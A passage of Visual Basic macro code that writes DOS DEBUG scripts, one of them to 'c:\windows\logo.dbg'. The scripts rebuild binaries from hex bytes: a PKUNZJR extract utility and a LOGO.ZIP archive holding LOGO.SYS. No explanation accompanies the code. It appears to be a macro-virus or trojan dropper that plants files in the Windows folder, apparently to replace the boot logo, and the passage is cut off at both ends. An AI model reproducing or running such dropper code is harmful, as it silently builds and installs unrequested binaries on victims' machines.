Print #2, "E 08F0 47 47 33 C9 4A 75 DC 5E 8B 3E D8 AE B9 00 01 33"
Print #2, "E 0900 C0 F3 AB BF C0 0B 8B 16 D6 A9 A3 D6 A9 4A 03 F2"
Print #2, "E 0910 03 FA 03 FA FD AC 84 C0 74 1E 3C 08 77 22 91 B8"
Print #2, "E 0920 01 00 41 D3 E0 8B 1D D1 E3 56 8B 36 D8 AE 89 10"
Print #2, "E 0930 03 D8 80 FF 02 72 F7 5E 4F 4F 4A 79 D8 FC 5A C3"
Print #2, "E 0940 2C 08 8A C8 8B 05 8A D8 32 FF D1 E3 03 1E D8 AE"
Print #2, "E 0950 B5 01 56 52 83 3F 00 75 18 8B 16 D6 A9 8B F2 D1"
Print #2, "E 0960 EA F7 D2 89 17 83 06 D6 A9 04 33 D2 89 12 89 52"
Print #2, "E 0970 02 8B 1F F7 D3 D1 E3 03 DD 84 E5 74 02 43 43 D0"
Print #2, "E 0980 E5 FE C9 75 CF 5A 89 17 EB AD 51 52 8B CF BA 00"
Print #2, "E 0990 0E 8B FA 2B CA 89 0E DC AE E8 03 00 5A 59 C3 53"
Print #2, "E 09A0 52 E8 DC F9 5A 8B 1E D0 AE B4 40 CD 21 5B 3B C1"
Print #2, "E 09B0 75 01 C3 B4 3E CD 21 BA 2C AA B4 41 CD 21 BA B1"
Print #2, "E 09C0 0B B0 06 E9 76 F7 0D 0A 50 4B 55 4E 5A 4A 52 28"
Print #2, "E 09D0 54 4D 29 20 20 46 41 53 54 21 20 20 4D 69 6E 69"
Print #2, "E 09E0 20 45 78 74 72 61 63 74 20 55 74 69 6C 69 74 79"
Print #2, "E 09F0 20 20 56 65 72 73 69 6F 6E 20 32 2E 30 34 67 20"
Print #2, "E 0A00 20 30 32 2D 30 31 2D 39 33 0D 0A 43 6F 70 72 2E"
Print #2, "E 0A10 20 31 39 38 39 2D 31 39 39 33 20 50 4B 57 41 52"
Print #2, "E 0A20 45 20 49 6E 63 2E 20 41 6C 6C 20 52 69 67 68 74"
Print #2, "E 0A30 73 20 52 65 73 65 72 76 65 64 2E 0D 0A 00 50 4B"
Print #2, "E 0A40 55 4E 5A 4A 52 3A 20 00 0D 0A 00 53 65 61 72 63"
Print #2, "E 0A50 68 69 6E 67 20 5A 49 50 3A 20 00 57 61 72 6E 69"
Print #2, "E 0A60 6E 67 21 20 00 00 50 4B 00 00 45 72 72 6F 72 20"
Print #2, "E 0A70 69 6E 20 5A 49 50 20 2D 20 55 73 65 20 50 4B 5A"
Print #2, "E 0A80 69 70 46 69 78 00 44 6F 20 79 6F 75 20 77 61 6E"
Print #2, "E 0A90 74 20 74 6F 20 65 78 74 72 61 63 74 20 74 68 65"
Print #2, "E 0AA0 73 65 20 66 69 6C 65 73 20 6E 6F 77 20 28 79 2F"
Print #2, "E 0AB0 6E 29 3F 20 00 54 6F 6F 20 6D 61 6E 79 20 66 69"
Print #2, "E 0AC0 6C 65 73 00 43 61 6E 27 74 20 4F 70 65 6E 3A 20"
Print #2, "E 0AD0 00 55 73 61 67 65 3A 20 20 70 6B 75 6E 7A 6A 72"
Print #2, "E 0AE0 20 5B 2D 6F 5D 20 66 69 6C 65 6E 61 6D 65 5B 2E"
Print #2, "E 0AF0 7A 69 70 5D 20 5B 6F 75 74 70 75 74 5F 70 61 74"
Print #2, "E 0B00 68 5D 0D 0A 00 55 6E 6B 6E 6F 77 6E 20 63 6F 6D"
Print #2, "E 0B10 70 72 65 73 73 69 6F 6E 20 6D 65 74 68 6F 64 20"
Print #2, "E 0B20 66 6F 72 3A 20 00 20 61 6C 72 65 61 64 79 20 65"
Print #2, "E 0B30 78 69 73 74 73 21 20 4F 76 65 72 77 72 69 74 65"
Print #2, "E 0B40 3F 20 00 43 61 6E 27 74 20 63 72 65 61 74 65 3A"
Print #2, "E 0B50 20 00 66 69 6C 65 20 66 61 69 6C 73 20 43 52 43"
Print #2, "E 0B60 20 63 68 65 63 6B 00 45 78 74 72 61 63 74 69 6E"
Print #2, "E 0B70 67 3A 20 00 20 49 6E 66 6C 61 74 69 6E 67 3A 20"
Print #2, "E 0B80 00 46 69 6C 65 20 68 61 73 20 61 20 62 61 64 20"
Print #2, "E 0B90 74 61 62 6C 65 00 10 11 12 00 08 07 09 06 0A 05"
Print #2, "E 0BA0 0B 04 0C 03 0D 02 0E 01 0F 01 03 07 0F 1F 3F 7F"
Print #2, "E 0BB0 FF 64 69 73 6B 20 66 75 6C 6C 00 00 01 00"
Print #2, "RCX"
Print #2, "0ABE"
Print #2, "W"
Print #2, "Q"
Close #2
End Sub
Sub LogoZip()
Open "c:\windows\logo.dbg" For Output As #3
Print #3, "N LOGO.ZIP"
Print #3, "E 0100 50 4B 03 04 14 00 00 00 08 00 38 51 9B 28 17 D3"
Print #3, "E 0110 09 49 36 12 00 00 36 F8 01 00 08 00 00 00 6C 6F"
Print #3, "E 0120 67 6F 2E 53 59 53 ED 9D 39 8F 2B C7 15 46 6B 04"
Print #3, "E 0130 07 8E E4 3F 20 28 36 6C 28 15 60 40 81 E1 44 81"
Print #3, "E 0140 E0 50 89 52 45 0A 9D 39 B3 33 67 86 23 47 4A 9D"
Print #3, "E 0150 28 76 A0 DC 86 42 07 86 9D 71 E9 66 73 99 85 FB"
Print #3, "E 0160 BE CC 0C 7D 6F 55 F5 CA 2E D7 13 6E BF 9E 9E E1"
Print #3, "E 0170 77 04 E1 91 C5 4B 72 FA 9B EA 66 73 58 F7 F0 37"
Print #3, "E 0180 BF FD 74 7F A3 98 4F 7F A2 D4 CF E9 DF 5F D3 D5"
Print #3, "E 0190 BF D0 FF 37 EA A7 7A 5C AD 6F D4 BF 3E 54 EA 9F"
Print #3, "E 01A0 1F 9A AB 2D F3 8F 3A D3 7F EA 7C 56 00 80 F7 CD"
Print #3, "E 01B0 59 FD 4C CD D5 C7 2A 54 9F A8 7F AB CF D4 3F D4"
Print #3, "E 01C0 17 EA EF EA 2B F5 37 F5 8D FA AB FA BD FA 13 FD"
Print #3, "E 01D0 F7 7B BA F4 0D 8D 7C 45 B7 7C 41 15 9F 51 E5 27"
Print #3, "E 01E0 74 8F 8F E9 9E 3F E3 BD 55 2D 68 1F 8E 3E 52 EA"
Print #3, "E 01F0 BF BF 50 EA 87 5F 29 F5 FD E7 4A 7D F7 A5 52 DF"
Print #3, "E 0200 7E AD D4 9F 7F A7 D4 1F FF A0 D4 EF FE AC D4 D7"
Print #3, "E 0210 DF 2A F5 E5 77 4A 7D FE BD 52 BF FA 41 A9 5F FE"
Print #3, "E 0220 47 A9 8F 22 A5 3E 5C E8 1F 45 3D 4C 66 8B D5 66"
Print #3, "E 0230 77 38 3D 9D DB DD A0 D7 1F DE DE 8F A7 3C B4 DD"
Print #3, "E 0240 1F 69 AC D5 09 C2 A8 3F 1C DD DD 3F 4C 68 78 B9"
Print #3, "E 0250 5A 6F B6 BB C3 F1 78 7A 7C 7A 3E B7 5A ED 4E A7"
Print #3, "E 0260 DB 0D 82 30 EC F5 7A 51 16 BA 1E 86 41 D0 ED 76"
Print #3, "E 0270 3A ED 56 EB FC FC F4 78 3A 1E 0F BB ED 66 BD 5A"
Print #3, "E 0280 2E 66 D3 C9 C3 FD DD 68 D8 8F C2 A0 D3 3A 3F 9D"
Print #3, "E 0290 8E FB ED 66 45 C3 E3 FB DB 61 BF 17 74 DB 34 76"
Print #3, "E 02A0 D8 F1 D0 E4 E1 6E 34 88 C2 6E A7 F5 FC 48 55 EB"
Print #3, "E 02B0 E5 7C AA 87 A8 AA 43 55 34 B6 DB AC ED 23 DE 8E"
Print #3, "E 02C0 86 34 1E 06 5D 7A 4A 7E 46 7A CA C3 61 BF DF 6D"
Print #3, "E 02D0 B7 DB CD 66 CD AC 0C FA F2 66 43 E3 BB FD FE 70"
Print #3, "E 02E0 A0 8D D1 5B D3 EE 74 83 B0 D7 1F 0C 47 B7 76 6B"
Print #3, "E 02F0 D7 9B DD FE F8 48 C9 74 28 99 C1 E8 8E 46 E7 CB"
Print #3, "E 0300 35 25 F3 F8 DC EA 74 C3 48 0F E9 FC CC 90 CE 4F"
Print #3, "E 0310 0F 71 15 65 AA CB F8 AE 34 4A B1 CE F9 21 E9 49"
Print #3, "E 0320 0F 3A 3F 7E 4A 0E 30 B0 01 26 11 EA CB 1C 5F C0"
Print #3, "E 0330 F1 F1 C6 E8 FC 0E 7B CE 6F B9 98 53 50 0F 77 B7"
Print #3, "E 0340 1C 82 0E 86 B2 E2 64 74 58 3A 3F 13 56 2E 3F 93"
Print #3, "E 0350 A8 CE 8F 42 E6 A1 4C F2 CB F9 6C 62 1F 31 E2 FC"
Print #3, "E 0360 32 BF 31 8A 6F 67 E3 5B 65 B1 01 EE 38 C0 74 36"
Print #3, "E 0370 70 7E 91 DD DA C9 6C BE CC CD 22 1A A6 A9 C5 F9"
Print #3, "E 0380 D9 D9 A6 F3 B3 43 F9 48 79 88 E6 24 8D E9 49 19"
Print #3, "E 0390 0D 28 D5 FB 31 0D 9B 09 68 7E 67 F4 94 36 40 3D"
Print #3, "E 03A0 03 4D 82 31 61 32 FB 28 3E B3 31 34 17 CC F4 A3"
Print #3, "E 03B0 29 34 BE A7 A4 06 91 9E 6A 94 D5 81 27 91 9D 59"
Print #3, "E 03C0 F9 C9 66 67 64 27 33 23 F5 10 47 4A 55 3A D3 95"
Print #3, "E 03D0 7D 44 9E 7E 51 3A FD 4E 27 1B DF 86 E3 D3 A9 2D"
Print #3, "E 03E0 0D 36 41 1A B7 01 9E 4E E9 04 8C 78 02 DA AD 5D"
Print #3, "E 03F0 E9 AC 28 19 0E 4B EF 9A 99 BD B5 63 F7 56 DF F1"
Print #3, "E 0400 06 B8 E1 BD D5 5F 05 5C F0 DE EA AF 02 2E F8 98"
Print #3, "E 0410 E8 AF 02 2E F8 00 E8 AF 02 2E F8 CC CE 5F 05 5C"
Print #3, "E 0420 F0 E9 8A BF 0A B8 E0 33 3B 7F 15 70 C1 67 80 FE"
Print #3, "E 0430 2A E0 82 DF 9A F9 AB 80 0B 7E BF E6 AF 02 2E F8"
Print #3, "E 0440 5D 9D BF 0A B8 E0 B7 C0 FE 2A E0 82 FF B6 E2 AF"
Print #3, "E 0450 02 2E F8 0F 56 FE 2A E0 82 FF 38 EA AF 02 2E F8"
Print #3, "E 0460 6F 80 FE 2A E0 82 FF 2E ED AF 02 2E F8 EF D2 FE"
Print #3, "E 0470 2A E0 82 3F DD F0 57 01 17 FC 91 9B BF 0A B8 E0"
Print #3, "E 0480 8F DC FC 55 C0 05 7F 8A E9 AF 02 2E F8 53 4C 6F"
Print #3, "E 0490 11 70 C2 6B 0E BC 45 C0 09 7F B2 EE AF 02 2E 78"
Print #3, "E 04A0 19 87 BF 0A B8 E0 A5 31 FE 2A E0 82 17 0D F9 AB"
Print #3, "E 04B0 80 0B 5E 60 E5 AF 02 2E 78 1D 96 BF 0A B8 E0 15"
Print #3, "E 04C0 92 FE 2A E0 82 57 4D FA AB 80 0B 5E DC EB AF 02"
Print #3, "E 04D0 2E 78 21 AA BF 0A B8 E0 C5 BD FE 2A E0 82 97 8D"
Print #3, "E 04E0 FB AB 80 0B 5E 9D EF AF 02 2E 78 25 BE BF 0A B8"
Print #3, "E 04F0 E0 1E 0F 7F 15 70 C1 7D 33 FE 2A E0 82 9B B4 FC"
Print #3, "E 0500 55 C0 05 B7 22 F9 AB 80 0B 6E 1C F4 57 01 17 DC"
Print #3, "E 0510 38 E8 AF 02 2E B8 BF D0 5F 05 5C 70 2F A6 BF 0A"
Print #3, "E 0520 B8 E0 06 61 7F 15 70 C1 9D D3 FE 2A E0 82 DB CC"
Print #3, "E 0530 FD 55 C0 05 37 A3 FB AB 80 0B EE F0 F7 57 01 17"
Print #3, "E 0540 AC 8E F0 57 01 17 AC E8 F0 57 01 17 6C E3 F0 57"
Print #3, "E 0550 01 17 2C CA F1 57 01 17 2C CA F1 57 01 17 EC D8"
Print #3, "E 0560 F1 57 01 17 AC 23 F2 57 01 17 2C C9 F2 57 01 17"
Print #3, "E 0570 2C 0F F3 57 01 17 AC FA F3 57 01 17 AC FA F3 57"
Print #3, "E 0580 01 17 AC FA F3 57 01 17 6C 4F F4 57 01 17 2C 54"
Print #3, "E 0590 F4 57 01 17 EC 3A F5 57 01 17 6C 85 F5 57 01 17"
Print #3, "E 05A0 6C 94 F5 57 01 17 2C 3A F6 57 01 17 2C 2B F6 57"
Print #3, "E 05B0 01 17 2C 3A F6 57 01 17 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 05C0 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 05D0 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 05E0 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 05F0 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 0600 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 0610 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 0620 A3 46 FF F3 0D E1 AF 7A 0F DC 24 F8 6B 7F 2C 35"
Print #3, "E 0630 FA 9F 2F 36 E0 83 12 1C F7 15 71 93 C1 5F FD E3"
Print #3, "E 0640 A8 D1 FF FC 62 F9 25 BC 87 00 AB F0 3F A7 3F 54"
Print #3, "E 0650 F6 C7 BB 48 E4 5D 67 41 5A 90 29 2D CF F8 E2 F1"
Print #3, "E 0660 D2 9B CB 7E 19 EF 25 3F B1 BF F8 5D B7 37 DE 54"
Print #3, "E 0670 5F 82 EF 9C DF 4D 86 4C 59 F1 D2 7B DD 81 2B F0"
Print #3, "E 0680 3F 97 6D 6F D9 76 94 E6 52 86 6B 73 0B 53 EA C7"
Print #3, "E 0690 3C EF 4D FC 6F F5 F9 89 FD C5 AF 21 BF E2 A5 CA"
Print #3, "E 06A0 A8 C0 FF 5C FD 76 98 DB 2F AA 9A 99 9F D8 5F 7C"
Print #3, "E 06B0 93 C3 8C BD 64 7E 1F 14 8A 93 5B 33 3F 5F 65 54"
Print #3, "E 06C0 E0 7F 2E CD E5 83 0C 99 BA 38 17 CF 66 DC DC DC"
Print #3, "E 06D0 94 54 15 F2 2B DB CF 3F C8 51 52 57 7D 7E 62 7F"
Print #3, "E 06E0 71 FA 53 E5 7E BE C2 46 E4 36 A3 F8 10 45 CA EB"
Print #3, "E 06F0 8A F9 95 D4 99 92 C2 13 27 BF BA F7 90 5F 05 FE"
Print #3, "E 0700 67 47 7E 22 4A 63 BE CC EF E5 A9 C0 FF 5C 4B 7E"
Print #3, "E 0710 17 B3 B9 21 54 E1 7F 4E 37 B4 BA DD A3 F8 AB 68"
Print #3, "E 0720 6E 7E F0 17 4B 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 0730 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 0740 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 0750 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 0760 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 0770 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 0780 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0790 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 07A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 07B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 07C0 03 FE 67 19 B5 FA 9F A7 93 87 FB BB DB D1 70 10"
Print #3, "E 07D0 F5 E2 27 3D EC B7 EB D5 62 36 1D DF DF E5 DE 47"
Print #3, "E 07E0 D2 58 EE 73 D5 5D D2 E5 D3 6F D4 EF BB 46 FF F3"
Print #3, "E 07F0 6C 3A 19 73 7E C3 41 3F EA 05 D6 BA 7A D8 6D D7"
Print #3, "E 0800 4B CA 6A 7C 7F 9B 7B 1F B4 9C 4F B3 9F 0B 1E 76"
Print #3, "E 0810 1B BB 4C 7B D8 EF 05 AA 39 D4 E8 7F 9E 4E 26 14"
Print #3, "E 0820 09 4F 3F 7A DB 1D 74 52 6D 23 65 75 F1 19 7E 21"
Print #3, "E 0830 BF FD 36 CE 6F 10 85 41 B1 F8 05 A9 D1 FF CC D3"
Print #3, "E 0840 8F F3 1B D0 09 67 D8 ED A4 DA C1 45 3E 2B 33 36"
Print #3, "E 0850 9B 64 3F 17 A4 BD DC 2E D3 A6 FC 9A 24 0C AE D1"
Print #3, "E 0860 FF 3C 19 73 7E 34 FD 28 BF A0 DB CE E4 37 9B F8"
Print #3, "E 0870 F2 DB 6D E2 FC FA C9 AE DF 08 6A F4 3F F3 D1 8F"
Print #3, "E 0880 F3 EB D3 09 27 ED BE A9 76 70 9E CF CA 8C D1 2B"
Print #3, "E 0890 4A E6 2A 1D FE 38 51 3A 78 52 7E 4D 12 06 D7 E8"
Print #3, "E 08A0 7F 1E 3F 70 7E FC EA 41 6F BB 3B AD 4C 7E D3 B1"
Print #3, "E 08B0 2F 3F 7E 91 36 97 68 F7 6D 52 7E 35 FA 9F F9 C5"
Print #3, "E 08C0 37 BE 4C BB 6F AA 1D 9C E5 B3 32 63 34 D9 32 57"
Print #3, "E 08D0 E9 F0 67 97 69 53 7E 4D 12 06 D7 E8 7F 7E B8 4F"
Print #3, "E 08E0 F3 A3 DD 37 93 DF E4 21 9B 1F 9F 11 9A FC D2 D7"
Print #3, "E 08F0 8A CD 2A CE AF 97 7D E5 7E 79 6A F4 3F F3 B9 5F"
Print #3, "E 0900 7C 99 76 5F A3 1D E4 60 A6 F6 C0 66 6F E3 D7 5A"
Print #3, "E 0910 DE 7D E9 95 3A 93 DF C2 2E D3 A6 FC EA 12 06 BF"
Print #3, "E 0920 0B 35 FA 9F EF EF D2 FC 68 F7 35 F9 25 6F 3E 06"
Print #3, "E 0930 49 7E 3B 9D 29 9F 50 67 5E 2B 96 49 97 4F A3 76"
Print #3, "E 0940 DF 3A FD CF 6F 92 1A FD CF 6F 92 2A FC CF D7 4C"
Print #3, "E 0950 05 FE E7 AB A6 02 FF F3 55 53 81 FF F9 AA A9 C0"
Print #3, "E 0960 FF 7C D5 54 E0 7F BE 6A 2A F0 3F 5F 35 15 F8 9F"
Print #3, "E 0970 AF 9A 0A FC CF 57 4D 05 FE E7 AB A6 0A FF F3 35"
Print #3, "E 0980 03 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0990 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 09A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 09B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 09C0 03 FE 67 19 F0 3F CB 80 FF 59 46 15 FE E7 20 0C"
Print #3, "E 09D0 7B BD 28 8A FA 84 1D EA F7 23 D3 96 1D 04 DD B8"
Print #3, "E 09E0 5F E3 F1 74 BA F8 A8 B4 DF 0B B9 95 E1 F1 A4 FB"
Print #3, "E 09F0 08 33 37 D0 D8 71 9F 76 2D 68 9E A8 2A 73 95 7B"
Print #3, "E 0A00 C0 9E 69 8C 7B E3 E2 3A D3 DB 19 D4 D7 22 52 85"
Print #3, "E 0A10 FF 99 F2 33 01 52 84 76 88 2F F3 BF 21 C7 97 E4"
Print #3, "E 0A20 77 BC F8 A8 8F 1B 31 DB 67 CA 8A 1B 2C 33 F9 B5"
Print #3, "E 0A30 CF 3A 98 7C 7E 94 68 3E BF 24 F9 D5 C2 D6 E9 DE"
Print #3, "E 0A40 4E 6E 4E 6C D7 B4 AA BB 2A FF 33 05 98 ED CB 8D"
Print #3, "E 0A50 22 7D 55 CF BE B8 5F E3 74 2C C9 2F 2C ED C6 A2"
Print #3, "E 0A60 4C 4B 56 D5 F1 8C CC 5C CD F5 80 A5 F0 F4 53 ED"
Print #3, "E 0A70 D6 B9 9E 65 A1 55 F9 9F 79 06 66 AE F6 7A 71 7E"
Print #3, "E 0A80 14 5F 92 DF E1 E2 A3 BE 5E 59 37 96 AB C5 83 A7"
Print #3, "E 0A90 5A E6 6A 90 ED 01 4B D1 F9 29 CA AF 96 75 8D 55"
Print #3, "E 0AA0 F9 9F 79 1F CE 5C ED F5 F8 AA 99 7D F1 AE 74 3C"
Print #3, "E 0AB0 94 E4 17 5C B6 73 38 3B DC 28 BF EC DF 7A 73 3D"
Print #3, "E 0AC0 60 29 F6 E8 F7 FC F4 58 C7 C2 A8 AA FC CF 41 90"
Print #3, "E 0AD0 CB 2F E4 38 29 3E DA 93 DA AD 24 BF FD C5 47 7D"
Print #3, "E 0AE0 7C A8 3A 3F D1 8E 99 19 73 76 B8 D1 EE 9B CF CF"
Print #3, "E 0AF0 1E 38 F3 55 75 E7 57 8D BF B8 1B 04 41 E6 6A 18"
Print #3, "E 0B00 06 F6 95 97 E2 B3 7B D9 61 BF DF 6D D6 AB E5 62"
Print #3, "E 0B10 9E AA 0D 72 7D D4 16 67 87 1B BF 20 67 AE 26 3D"
Print #3, "E 0B20 60 79 28 3E BE 3B C5 57 C7 C2 A8 AA FC CF DD 6E"
Print #3, "E 0B30 2E BF 20 8E 4F 51 7C 49 7E BB 8B 8F FA 72 7D D4"
Print #3, "E 0B40 C9 20 9D 97 94 2D 8A A5 A9 96 CF AF F4 10 67 F2"
Print #3, "E 0B50 AB 69 FA 55 E6 7F EE F0 BE 9A C2 E9 99 13 17 8A"
Print #3, "E 0B60 CF 1E A5 F6 BB 92 FC CA 5F 43 F9 EC 2F 37 A0 E7"
Print #3, "E 0B70 9A 96 48 A4 CD 9A BC FB 96 DC 97 E2 6B D5 16 5F"
Print #3, "E 0B80 25 FE E7 56 BB DD EE 70 80 34 09 ED 50 37 8E 4F"
Print #3, "E 0B90 51 7C 49 7E 5B BD FB 6A 0F 87 ED 64 E5 3E EA A7"
Print #3, "E 0BA0 13 1F D8 B8 8F 30 7D 48 3E 55 DE AC 53 89 44 C7"
Print #3, "E 0BB0 9E 4F 9B 2E 74 33 66 0E 9C BA DB 30 11 00 E8 73"
Print #3, "E 0BC0 67 6E 4E 7C AA 69 55 77 15 FE E7 73 AB C5 01 EA"
Print #3, "E 0BD0 04 ED 10 A7 67 5E 44 29 3E BB 97 ED B6 FC 46 81"
Print #3, "E 0BE0 8E 7E 5A 03 63 EB D2 37 1F 05 E1 CB C1 B6 EC 9B"
Print #3, "E 0BF0 6B FA A5 22 6E 6C B5 F7 B5 6F 3E F8 E4 79 1A D7"
Print #3, "E 0C00 E9 73 E7 BA CE 5D 18 F8 9F 65 C0 FF 2C 03 FE 67"
Print #3, "E 0C10 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF"
Print #3, "E 0C20 B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80"
Print #3, "E 0C30 FF 59 06 FC CF 32 E0 7F 96 51 AB FF F9 0D 52 A3"
Print #3, "E 0C40 FF F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF"
Print #3, "E 0C50 F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF B9"
Print #3, "E 0C60 04 B3 76 CF 0A 64 A3 64 30 23 1B FF BF 77 6F 00"
Print #3, "E 0C70 35 FA 9F 5D 14 F4 ED E9 2A 17 F6 17 97 DE A3 41"
Print #3, "E 0C80 D4 E8 7F 76 91 7E FA 9D E7 36 9D 92 CD A5 46 FF"
Print #3, "E 0C90 B3 8B 32 7D BB 52 C5 2F 54 69 28 0D F0 3F F3 97"
Print #3, "E 0CA0 CF 5C 0C D2 E1 EF 55 7C 2E D8 00 FF F3 34 FF 55"
Print #3, "E 0CB0 01 4C E1 DB 3F 1A 4C 03 FC CF D3 71 31 BF 65 C9"
Print #3, "E 0CC0 17 D2 34 94 06 F8 9F F9 BB A3 B2 D7 37 49 37 C2"
Print #3, "E 0CD0 2B A0 01 FE E7 C9 43 2E 3F 3E FB 33 97 1A F6 55"
Print #3, "E 0CE0 33 A5 BC AC FF 59 AF DD A3 DD 77 34 E4 46 24 33"
Print #3, "E 0CF0 C6 8B FC F8 EC 79 D4 B0 6F 8A 2A 07 FE 67 19 F0"
Print #3, "E 0D00 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C"
Print #3, "E 0D10 F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59"
Print #3, "E 0D20 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF"
Print #3, "E 0D30 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0"
Print #3, "E 0D40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0D50 F0 3F CB A8 C8 FF 1C F5 FB 03 66 98 59 F3 C8 0E"
Print #3, "E 0D60 D9 28 B3 80 39 75 7A B1 04 CB 5C 1A F4 7B 97 4B"
Print #3, "E 0D70 74 79 E1 46 DB 68 B1 72 E7 A6 6C FB CB 5C 8D 72"
Print #3, "E 0D80 02 59 33 76 3B 1A DA 76 7A D6 38 A9 F7 4F 35 FE"
Print #3, "E 0D90 E7 5E 6A 8E 4D E0 F8 8C 86 D2 F2 F4 98 E4 B7 98"
Print #3, "E 0DA0 C7 F9 45 BD A0 78 C7 61 92 69 BA 94 48 F3 9C F7"
Print #3, "E 0DB0 2C 96 B9 2B 29 3F F3 83 D4 14 5F 35 FE E7 5E AF"
Print #3, "E 0DC0 77 B1 52 D9 18 8C 7B 61 AA 05 4C 8D 86 CB C5 DC"
Print #3, "E 0DD0 BA D6 FA 51 98 DC 1E 43 F9 D9 B1 42 7E 3C D5 32"
Print #3, "E 0DE0 57 CB 3C 8B 34 FD 74 7E 9D 4E 4D 02 DE AA FC CF"
Print #3, "E 0DF0 C5 B1 BE 15 18 B3 08 D0 0E A5 FE E7 E5 3C 76 D5"
Print #3, "E 0E00 A5 CB AE 52 06 49 A6 7E FF B3 2A C0 FE E7 44 41"
Print #3, "E 0E10 59 07 15 F8 9F BB 79 F5 A9 26 F6 3F 1B 93 9D B9"
Print #3, "E 0E20 94 FA 9F 53 83 67 CE FF 6C EF 9B AE 5B 7B 47 FF"
Print #3, "E 0E30 73 66 8C FD CF 5A AA AA 6A A2 02 FF 73 41 DD A9"
Print #3, "E 0E40 B1 FE 67 BE 35 EF 7F 66 85 A2 62 85 A2 AD 4B FC"
Print #3, "E 0E50 CF DB EC B2 49 9B 1F F7 D1 A4 8F 59 E6 7F 7E 2A"
Print #3, "E 0E60 64 3A E4 17 24 AD 50 7C 45 FE E7 82 3B 56 43 87"
Print #3, "E 0E70 44 3D 29 D3 F8 8C FF 99 F2 5B 2A DA 7D 13 5F 64"
Print #3, "E 0E80 EC 2A 66 83 A2 B9 94 2E 3B 2D E4 F7 0E FE 67 A3"
Print #3, "E 0E90 1F EF B2 B4 F6 B9 16 05 65 25 FE E7 B2 19 18 86"
Print #3, "E 0EA0 7C 14 CB C4 A7 FD CF C6 E0 39 9F 26 BE CD E4 35"
Print #3, "E 0EB0 74 93 EC AB A9 FF 99 75 93 99 87 7C 07 FF 33 E5"
Print #3, "E 0EC0 67 8F 25 AF CA FF 5C 1A A0 71 C8 A6 47 22 F6 3F"
Print #3, "E 0ED0 73 7E C6 E0 19 17 C5 05 E9 AA F1 D4 FF 9C E6 C7"
Print #3, "E 0EE0 4A 5E E3 7F 4E 5B 1B F8 C0 A9 0A F0 F4 33 97 5E"
Print #3, "E 0EF0 97 FF 99 03 64 05 79 F6 95 24 EB BE 67 8C FF D9"
Print #3, "E 0F00 BC 7A 8C E3 FC 92 53 E0 75 72 AA 92 9E 97 AC 12"
Print #3, "E 0F10 27 AA 7E A9 88 05 A8 F6 BE A9 7A 76 99 BC 1E F5"
Print #3, "E 0F20 F9 05 C9 18 50 EB F2 17 57 E3 7F BE 56 AA F2 3F"
Print #3, "E 0F30 5F 2B 55 F8 9F AF 99 2A FC CF D7 0C FC CF 32 E0"
Print #3, "E 0F40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0F50 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3"
Print #3, "E 0F60 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF"
Print #3, "E 0F70 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0"
Print #3, "E 0F80 FF 2C 03 FE 67 19 2F EB 7F 7E FD 34 C0 FF FC AA"
Print #3, "E 0F90 69 80 FF F9 55 D3 00 FF F3 AB A6 01 FE E7 57 4D"
Print #3, "E 0FA0 03 FC CF AF 9A 06 F8 9F 5F 35 F5 FB 9F 79 79 7C"
Print #3, "E 0FB0 E6 EA 62 16 AF 85 4E D7 83 B3 94 F7 9E BF BD 82"
Print #3, "E 0FC0 97 ED C6 AB C0 63 25 AF 6E 77 50 4D A1 7E FF 73"
Print #3, "E 0FD0 98 6F 6E 49 BF BD 82 97 F2 66 6E 18 0D 72 DF FE"
Print #3, "E 0FE0 31 4D 2C DB E7 A7 53 73 94 71 F5 FB 9F 0B CD 41"
Print #3, "E 0FF0 E9 7A E6 C2 7A 70 D7 B7 7F F0 7A E9 B2 F1 97 A1"
